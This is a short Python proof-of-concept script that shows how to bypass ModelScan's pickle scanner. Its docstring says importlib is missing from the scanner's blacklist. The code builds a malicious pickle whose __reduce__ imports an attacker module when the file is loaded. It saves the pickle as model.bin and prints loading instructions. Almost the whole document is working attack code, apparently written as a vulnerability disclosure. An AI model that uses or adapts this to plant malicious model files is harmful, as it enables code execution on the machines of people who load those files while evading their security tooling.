| #!/usr/bin/env python3 | |
| """ | |
| ModelScan PickleUnsafeOpScan Bypass — importlib.import_module RCE | |
| ================================================================= | |
| Vulnerability: ModelScan's PickleUnsafeOpScan only checks unsafe_globals | |
| against a hardcoded blacklist. 'importlib' is NOT in the blacklist. | |
| This allows arbitrary Python module import and code execution | |
| via pickle's __reduce__ mechanism without ModelScan detection. | |
| """ | |
| import pickle | |
| import importlib | |
| class ImportlibRCE: | |
| def __reduce__(self): | |
| # importlib.import_module is NOT in ModelScan's unsafe_globals | |
| # When victim loads this pickle, it imports 'malice' module | |
| # which executes arbitrary code at module level | |
| return (importlib.import_module, ('malice',)) | |
| if __name__ == '__main__': | |
| # Save malicious pickle | |
| with open('model.bin', 'wb') as f: | |
| pickle.dump(ImportlibRCE(), f) | |
| print("[+] Malicious pickle saved to model.bin") | |
| print("[+] Load with: pickle.load(open('model.bin', 'rb'))") | |
| print("[+] Make sure malice.py is in Python path") | |